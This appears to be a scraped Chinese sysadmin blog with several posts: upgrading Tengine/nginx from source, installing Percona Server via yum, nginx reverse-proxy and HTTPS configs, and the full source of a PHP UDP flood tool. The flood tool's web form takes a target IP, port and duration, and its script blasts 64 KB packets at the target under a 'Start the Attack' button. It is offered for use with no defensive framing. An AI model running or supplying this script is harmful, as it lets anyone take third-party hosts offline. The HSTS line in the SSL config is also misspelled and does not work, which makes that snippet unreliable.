by ·0评论
wget -c http://tengine.taobao.org/download/tengine-1.4.2.tar.gz
tar zxvf tengine-1.4.2.tar.gz
cd tengine-1.4.2
./configure --user=www --group=www --prefix=/usr/local/nginx --with-http_stub_status_module --with-http_ssl_module --with-http_gzip_static_module --with-ipv6
make
mv /usr/local/nginx/sbin/nginx /usr/local/nginx/sbin/nginx.old
rm -rf /usr/local/nginx/sbin/nginx
cp -r objs/nginx /usr/local/nginx/sbin/nginx
/usr/local/nginx/sbin/nginx  -t
kill -USR2 `cat /usr/local/nginx/logs/nginx.pid`
kill -QUIT `cat /usr/local/nginx/logs/nginx.pid.oldbin`
/etc/init.d/nginx  restart
/usr/local/nginx/sbin/nginx -v

更新于2012年12月14日

by ·0评论

RPM packages for RHEL (CENTOS)5 and RHEL(CENTOS) 6

cd  /etc/pki/rpm-gpg

wget http://www.percona.com/downloads/RPM-GPG-KEY-percona

rpm -Uhv http://www.percona.com/downloads/percona-release/percona-release-0.0-1.x86_64.rpm
vi /etc/yum.repos.d/Percona.repo
写入
[percona]
name = CentOS $releasever - Percona
baseurl=http://repo.percona.com/centos/$releasever/os/$basearch/
enabled = 1
gpgkey = file:///etc/pki/rpm-gpg/RPM-GPG-KEY-percona
gpgcheck = 1

yum list | grep percona

yum install Percona-Server-server-55

如果出错

warning: rpmts_HdrFromFdno: Header V4 DSA signature: NOKEY, key ID cd2efd2a

GPG key retrieval failed: [Errno 5] OSError: [Errno 2] No such file or directory: ‘/etc/pki/rpm-gpg/RPM-GPG-KEY-percona’

cd  /etc/pki/rpm-gpg

wget http://www.percona.com/downloads/RPM-GPG-KEY-percona

官网yum apt-get安装文档

http://www.percona.com/doc/percona-server/5.5/installation.html

 

btw:mysql配置在线生成器  Percona配置在线生成器

Percona Online Tools

https://tools.percona.com/

by ·2条评论

index.php

<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
	<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
	<meta name="author" content="">

	<title>PHP DoS, Coded by EXE</title>
</head>
<!-- PHP DOS, coded by EXE -->
<style type="text/css">
<!--
body {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
	font-style: normal;
	line-height: normal;
	color: #FFFFFF;
	background-color: #000000;
}

-->
</style>
<!-- PHP DOS, coded by EXE -->
<body>
<center><br><br>
<img src="main.jpg"><br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font> (Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
    Time:
<input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
    Port:
<input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value="    Start the Attack--->    ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>

</form>
</center>
<!-- PHP DOS, coded by EXE -->
</body>
</html>

function.php

<?php

//=================================================
//PHP DOS v1.8 (Possibly Stronger Flood Strength)
//Coded by EXE
//=================================================

$packets = 0;
$ip = $_POST['ip'];
$rand = $_POST['port'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_POST['time'];

$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;



for($i=0;$i<65535;$i++){
        $out .= "X";
}
while(1){
$packets++;
        if(time() > $max_time){
                break;
        }
        
        $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
        if($fp){
                fwrite($fp, $out);
                fclose($fp);
        }
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>

by ·0评论

nginx proxy反向代理增加后端服务器获取hostname,servername
server
{
listen 80;
server_name *.iamle.com;

location / {
proxy_pass http://10.96.1.104/;
proxy_redirect off;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
#这句就是给后端增加hostname 获取。
proxy_set_header Host $host;
}
}

by ·0评论
server{
listen 80;
server_name www.iamle.com;
return 301 https://www.iamle.com$request_uri;
}

server {

listen 443 ssl http2;
ssl    on;
ssl_certificate         /usr/local/nginx/conf/ssl/www.iamle.com.crt;
ssl_certificate_key     /usr/local/nginx/conf/ssl/www.iamle.com.key;
ssl_session_cache           shared:SSL:10m;
ssl_session_timeout         10m;
ssl_session_tickets         off;

ssl_protocols           TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers             'ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA:ECDHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA256:DHE-RSA-AES256-SHA:ECDHE-ECDSA-DES-CBC3-SHA:ECDHE-RSA-DES-CBC3-SHA:EDH-RSA-DES-CBC3-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:DES-CBC3-SHA:!DSS';
ssl_prefer_server_ciphers       on;

# HSTS (ngx_http_headers_module is required) (15768000 seconds = 6 months)
add_header Stricu-Transport-Security "max-age=63072000; includeSubdomains; preload";

# OCSP Stapling ---
# fetch OCSP records from URL in ssl_certificate and cache them
ssl_stapling on;
ssl_stapling_verify on;

add_header X-Frame-Options DENY;
add_header X-Content-Type-Options nosniff;
add_header X-Xss-Protection "1; mode=block";

server_name www.iamle.com;
#  ....
}

参考
Mozilla SSL Configuration Generator